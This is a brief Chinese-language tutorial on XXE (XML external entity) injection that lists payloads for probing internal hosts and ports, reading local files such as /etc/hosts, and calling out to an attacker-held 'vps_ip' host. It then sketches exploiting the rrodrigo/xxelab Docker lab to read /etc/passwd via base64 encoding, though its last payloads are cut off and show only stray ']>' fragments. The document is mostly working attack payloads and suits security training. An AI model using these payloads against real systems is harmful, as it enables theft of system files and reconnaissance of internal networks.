利用xxe获取linux系统的passwd

引用外部DTD文件访问内网主机/端口。

<!DOCTYPE a SYSTEM "http://127.0.0.1:2333"> （看响应时间）

引用外部DTD文件访问wai网。

<!DOCTYPE a SYSTEM "http://vps_ip" >

引用内部实体。

<!DOCTYPE a [<!ENTITY xxe "findneo">]><a>&xxe;</a>

外部实体读本地文件。

<!DOCTYPE a [<!ENTITY xxe SYSTEM "file:///etc/hosts">]><a>&xxe;</a>

外部实体访问内wang主机端口。

<!DOCTYPE a SYSTEM "http://192.168.1.2:80">（看响应时间）

外部实体访问wai网。

<!DOCTYPE a [<!ENTITY xxe SYSTEM "http://vps_ip">]><a>&xxe;</a>

docker中下载rrodrigo/xxelab该镜像

启动：docker run -d -p 8082:80 rrodrigo/xxelab

抓取注册包，发现采用xml格式传递，且邮箱有返回：

将返回内容处进行xxe回显设置读取/etc/passwd

]>

利用base64编码进行xxe，防止有返回包验证

]>

返回base64数据包，base64解码